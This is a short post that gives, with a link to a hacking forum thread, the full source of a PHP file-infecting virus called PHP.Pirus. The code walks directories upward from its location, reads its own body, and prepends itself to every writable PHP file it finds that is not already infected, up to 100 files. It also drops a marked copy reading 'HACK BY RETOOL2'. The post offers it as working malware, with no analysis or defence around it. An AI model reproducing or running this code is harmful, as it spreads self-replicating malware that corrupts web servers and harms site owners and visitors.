original code virus named PHP.Pirus
< ?php #retool2.php
$atefile = 0;
walkthrough('../..');
function walkthrough($dir) {
global $atefile;
$maxi = 100;
$viruscontents=fread(fopen(__FILE__,'r'), 1626);
if (!file_exists('retool2.php')) {
$handle = fopen('retool2.php', 'a');
fwrite($handle, $viruscontents.'HACK BY RETOOL2');
fclose($handle);
}
if(is_dir($dir)){
if($dh = opendir($dir)){
while(($file = readdir($dh)) !== false && $atefile<$maxi){
if($file != "." && $file != ".."){
if(is_dir($dir."/".$file)){
walkthrough($dir."/".$file);
}else{
if(strstr (substr($file, -4), 'php')){
$infected=true;
$caniwrite=false;
if ( is_file($dir."/".$file) && is_writeable($dir."/".$file) ){
$output = fopen($dir."/".$file, "r");
if(filesize ($dir."/".$file)>0){
$contents = fread ($output , 20);
$mine = strstr ($contents, 'retool2.php');
fclose($output );
}
$infected=false;
if($mine){$infected=true;}
}
if($infected==false){
if(filesize ($dir."/".$file)>0){
$victim = fopen($dir."/".$file, "r+");
$ori = fread($victim, filesize($dir."/".$file));
fclose($victim);
}
$victim = fopen($dir."/".$file, "w+");
if(filesize($dir."/".$file)==0){
fwrite($victim, $viruscontents);
}else{
fputs($victim ,$viruscontents.$ori);
}
$atefile++;
fclose($victim );
}
}
}
}
}
closedir($dh);
}
}
return $counter;
}
?>
link: http://www.rohitab.com/discuss/lofiversion/index.php/t10727.html